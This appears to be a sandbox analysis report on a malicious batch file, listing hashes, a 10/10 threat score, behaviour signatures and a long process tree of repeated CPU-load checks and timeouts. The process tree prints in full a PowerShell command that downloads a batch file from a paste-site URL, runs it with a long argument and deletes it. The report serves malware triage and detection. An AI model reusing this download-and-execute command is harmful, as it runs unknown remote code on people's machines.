4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12

Analysis

max time kernel
149s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
01-07-2024 03:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

235332764324758.bat
Size

517B
MD5

ac9d73455d58bfa42f81e718b8c8d6b5
SHA1

60040fff333b7bc09b22e5c013f11b8a99555ed3
SHA256

4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12
SHA512

ad24994554a8e6bb68f5ca80b1c53379f7a577964165f56d2f6bef14340fec3d0f17d14faa2db4651776a83bd5686f26ee59080ee2a16d0468b8d38504e460b2

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://rentry.co/regele/raw

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

1392 powershell.exe

pid	process
1392	powershell.exe

Delays execution with timeout.exe 64 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	process
3204	timeout.exe
3296	timeout.exe
3956	timeout.exe
1156	timeout.exe
5068	timeout.exe
2628	timeout.exe
2408	timeout.exe
1536	timeout.exe
1856	timeout.exe
3100	timeout.exe
4980	timeout.exe
3288	timeout.exe
888	timeout.exe
4432	timeout.exe
2488	timeout.exe
3192	timeout.exe
4252	timeout.exe
2532	timeout.exe
4468	timeout.exe
2584	timeout.exe
1764	timeout.exe
3640	timeout.exe
4004	timeout.exe
2752	timeout.exe
2184	timeout.exe
2188	timeout.exe
460	timeout.exe
2556	timeout.exe
1468	timeout.exe
4832	timeout.exe
2744	timeout.exe
2216	timeout.exe
64	timeout.exe
2312	timeout.exe
3584	timeout.exe
228	timeout.exe
1276	timeout.exe
736	timeout.exe
4356	timeout.exe
1644	timeout.exe
4020	timeout.exe
3920	timeout.exe
1584	timeout.exe
2784	timeout.exe
2256	timeout.exe
2252	timeout.exe
4752	timeout.exe
4932	timeout.exe
1704	timeout.exe
2124	timeout.exe
2404	timeout.exe
4868	timeout.exe
3580	timeout.exe
1316	timeout.exe
4688	timeout.exe
3592	timeout.exe
2844	timeout.exe
3616	timeout.exe
2012	timeout.exe
780	timeout.exe
4804	timeout.exe
3280	timeout.exe
4976	timeout.exe
1368	timeout.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

1392 powershell.exe
1392 powershell.exe

pid	process
1392	powershell.exe
1392	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeWMIC.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	1392	powershell.exe
Token: SeIncreaseQuotaPrivilege	4168	WMIC.exe
Token: SeSecurityPrivilege	4168	WMIC.exe
Token: SeTakeOwnershipPrivilege	4168	WMIC.exe
Token: SeLoadDriverPrivilege	4168	WMIC.exe
Token: SeSystemProfilePrivilege	4168	WMIC.exe
Token: SeSystemtimePrivilege	4168	WMIC.exe
Token: SeProfSingleProcessPrivilege	4168	WMIC.exe
Token: SeIncBasePriorityPrivilege	4168	WMIC.exe
Token: SeCreatePagefilePrivilege	4168	WMIC.exe
Token: SeBackupPrivilege	4168	WMIC.exe
Token: SeRestorePrivilege	4168	WMIC.exe
Token: SeShutdownPrivilege	4168	WMIC.exe
Token: SeDebugPrivilege	4168	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4168	WMIC.exe
Token: SeRemoteShutdownPrivilege	4168	WMIC.exe
Token: SeUndockPrivilege	4168	WMIC.exe
Token: SeManageVolumePrivilege	4168	WMIC.exe
Token: 33	4168	WMIC.exe
Token: 34	4168	WMIC.exe
Token: 35	4168	WMIC.exe
Token: 36	4168	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4168	WMIC.exe
Token: SeSecurityPrivilege	4168	WMIC.exe
Token: SeTakeOwnershipPrivilege	4168	WMIC.exe
Token: SeLoadDriverPrivilege	4168	WMIC.exe
Token: SeSystemProfilePrivilege	4168	WMIC.exe
Token: SeSystemtimePrivilege	4168	WMIC.exe
Token: SeProfSingleProcessPrivilege	4168	WMIC.exe
Token: SeIncBasePriorityPrivilege	4168	WMIC.exe
Token: SeCreatePagefilePrivilege	4168	WMIC.exe
Token: SeBackupPrivilege	4168	WMIC.exe
Token: SeRestorePrivilege	4168	WMIC.exe
Token: SeShutdownPrivilege	4168	WMIC.exe
Token: SeDebugPrivilege	4168	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4168	WMIC.exe
Token: SeRemoteShutdownPrivilege	4168	WMIC.exe
Token: SeUndockPrivilege	4168	WMIC.exe
Token: SeManageVolumePrivilege	4168	WMIC.exe
Token: 33	4168	WMIC.exe
Token: 34	4168	WMIC.exe
Token: 35	4168	WMIC.exe
Token: 36	4168	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3920	WMIC.exe
Token: SeSecurityPrivilege	3920	WMIC.exe
Token: SeTakeOwnershipPrivilege	3920	WMIC.exe
Token: SeLoadDriverPrivilege	3920	WMIC.exe
Token: SeSystemProfilePrivilege	3920	WMIC.exe
Token: SeSystemtimePrivilege	3920	WMIC.exe
Token: SeProfSingleProcessPrivilege	3920	WMIC.exe
Token: SeIncBasePriorityPrivilege	3920	WMIC.exe
Token: SeCreatePagefilePrivilege	3920	WMIC.exe
Token: SeBackupPrivilege	3920	WMIC.exe
Token: SeRestorePrivilege	3920	WMIC.exe
Token: SeShutdownPrivilege	3920	WMIC.exe
Token: SeDebugPrivilege	3920	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3920	WMIC.exe
Token: SeRemoteShutdownPrivilege	3920	WMIC.exe
Token: SeUndockPrivilege	3920	WMIC.exe
Token: SeManageVolumePrivilege	3920	WMIC.exe
Token: 33	3920	WMIC.exe
Token: 34	3920	WMIC.exe
Token: 35	3920	WMIC.exe
Token: 36	3920	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1352 wrote to memory of 1392	1352	cmd.exe	powershell.exe
PID 1352 wrote to memory of 1392	1352	cmd.exe	powershell.exe
PID 1352 wrote to memory of 5012	1352	cmd.exe	cmd.exe
PID 1352 wrote to memory of 5012	1352	cmd.exe	cmd.exe
PID 5012 wrote to memory of 4168	5012	cmd.exe	WMIC.exe
PID 5012 wrote to memory of 4168	5012	cmd.exe	WMIC.exe
PID 1352 wrote to memory of 4004	1352	cmd.exe	timeout.exe
PID 1352 wrote to memory of 4004	1352	cmd.exe	timeout.exe
PID 1352 wrote to memory of 4740	1352	cmd.exe	cmd.exe
PID 1352 wrote to memory of 4740	1352	cmd.exe	cmd.exe
PID 4740 wrote to memory of 3920	4740	cmd.exe	WMIC.exe
PID 4740 wrote to memory of 3920	4740	cmd.exe	WMIC.exe
PID 1352 wrote to memory of 2252	1352	cmd.exe	timeout.exe
PID 1352 wrote to memory of 2252	1352	cmd.exe	timeout.exe
PID 1352 wrote to memory of 3784	1352	cmd.exe	cmd.exe
PID 1352 wrote to memory of 3784	1352	cmd.exe	cmd.exe
PID 3784 wrote to memory of 2436	3784	cmd.exe	WMIC.exe
PID 3784 wrote to memory of 2436	3784	cmd.exe	WMIC.exe
PID 1352 wrote to memory of 3616	1352	cmd.exe	timeout.exe
PID 1352 wrote to memory of 3616	1352	cmd.exe	timeout.exe
PID 1352 wrote to memory of 3112	1352	cmd.exe	cmd.exe
PID 1352 wrote to memory of 3112	1352	cmd.exe	cmd.exe
PID 3112 wrote to memory of 1660	3112	cmd.exe	WMIC.exe
PID 3112 wrote to memory of 1660	3112	cmd.exe	WMIC.exe
PID 1352 wrote to memory of 4020	1352	cmd.exe	timeout.exe
PID 1352 wrote to memory of 4020	1352	cmd.exe	timeout.exe
PID 1352 wrote to memory of 4548	1352	cmd.exe	cmd.exe
PID 1352 wrote to memory of 4548	1352	cmd.exe	cmd.exe
PID 4548 wrote to memory of 2364	4548	cmd.exe	WMIC.exe
PID 4548 wrote to memory of 2364	4548	cmd.exe	WMIC.exe
PID 1352 wrote to memory of 64	1352	cmd.exe	timeout.exe
PID 1352 wrote to memory of 64	1352	cmd.exe	timeout.exe
PID 1352 wrote to memory of 2600	1352	cmd.exe	cmd.exe
PID 1352 wrote to memory of 2600	1352	cmd.exe	cmd.exe
PID 2600 wrote to memory of 2292	2600	cmd.exe	WMIC.exe
PID 2600 wrote to memory of 2292	2600	cmd.exe	WMIC.exe
PID 1352 wrote to memory of 3204	1352	cmd.exe	timeout.exe
PID 1352 wrote to memory of 3204	1352	cmd.exe	timeout.exe
PID 1352 wrote to memory of 4772	1352	cmd.exe	cmd.exe
PID 1352 wrote to memory of 4772	1352	cmd.exe	cmd.exe
PID 4772 wrote to memory of 4380	4772	cmd.exe	WMIC.exe
PID 4772 wrote to memory of 4380	4772	cmd.exe	WMIC.exe
PID 1352 wrote to memory of 4432	1352	cmd.exe	timeout.exe
PID 1352 wrote to memory of 4432	1352	cmd.exe	timeout.exe
PID 1352 wrote to memory of 3864	1352	cmd.exe	cmd.exe
PID 1352 wrote to memory of 3864	1352	cmd.exe	cmd.exe
PID 3864 wrote to memory of 376	3864	cmd.exe	WMIC.exe
PID 3864 wrote to memory of 376	3864	cmd.exe	WMIC.exe
PID 1352 wrote to memory of 2584	1352	cmd.exe	timeout.exe
PID 1352 wrote to memory of 2584	1352	cmd.exe	timeout.exe
PID 1352 wrote to memory of 3024	1352	cmd.exe	cmd.exe
PID 1352 wrote to memory of 3024	1352	cmd.exe	cmd.exe
PID 3024 wrote to memory of 4920	3024	cmd.exe	WMIC.exe
PID 3024 wrote to memory of 4920	3024	cmd.exe	WMIC.exe
PID 1352 wrote to memory of 3256	1352	cmd.exe	timeout.exe
PID 1352 wrote to memory of 3256	1352	cmd.exe	timeout.exe
PID 1352 wrote to memory of 3860	1352	cmd.exe	cmd.exe
PID 1352 wrote to memory of 3860	1352	cmd.exe	cmd.exe
PID 3860 wrote to memory of 1468	3860	cmd.exe	WMIC.exe
PID 3860 wrote to memory of 1468	3860	cmd.exe	WMIC.exe
PID 1352 wrote to memory of 2488	1352	cmd.exe	timeout.exe
PID 1352 wrote to memory of 2488	1352	cmd.exe	timeout.exe
PID 1352 wrote to memory of 2152	1352	cmd.exe	cmd.exe
PID 1352 wrote to memory of 2152	1352	cmd.exe	cmd.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\235332764324758.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1352

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://rentry.co/regele/raw', $tempfile); & $tempfile 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL; Remove-Item -Force $tempfile"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
- Suspicious use of WriteProcessMemory
PID:5012

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4168

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4004

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
- Suspicious use of WriteProcessMemory
PID:4740

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3920

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
- Suspicious use of WriteProcessMemory
PID:3784

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2436

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
- Suspicious use of WriteProcessMemory
PID:3112

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1660

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
- Suspicious use of WriteProcessMemory
PID:4548

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2364

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:64

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
- Suspicious use of WriteProcessMemory
PID:2600

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2292

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3204

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
- Suspicious use of WriteProcessMemory
PID:4772

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4380

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4432

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
- Suspicious use of WriteProcessMemory
PID:3864

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:376

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
- Suspicious use of WriteProcessMemory
PID:3024

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4920

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:3256

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
- Suspicious use of WriteProcessMemory
PID:3860

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1468

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2152

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4928

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1764

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:364

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4132

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3908

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1972

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4688

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:688

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2312

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:5044

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3644

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4360

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4300

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4088

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2456

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3016

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1528

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3552

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:780

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1512

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4284

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4996

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4168

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3296

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1480

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2040

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3920

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2096

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:720

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1264

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4276

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2076

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3112

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2484

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4904

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2408

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4092

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:532

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3012

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4380

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1536

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3068

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:376

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3280

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2316

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1920

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1656

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1384

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3748

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1344

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1228

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1232

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4832

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4960

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:364

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1316

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1972

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2404

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3268

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3528

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4484

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4780

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2784

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2852

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1092

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:228

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4532

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2132

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:208

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2332

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1276

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:5108

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4032

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4980

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4644

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:448

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4952

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4064

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1156

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2396

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1596

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1644

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3680

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2940

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2416

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:5020

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3652

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3812

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4640

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4924

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4172

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3168

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3932

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3500

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:636

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4720

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1940

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2472

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4872

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3288

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3028

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4920

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1148

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2856

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4528

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3724

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2184

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4724

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1544

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2216

C:\Windows\system32\cmd.exe
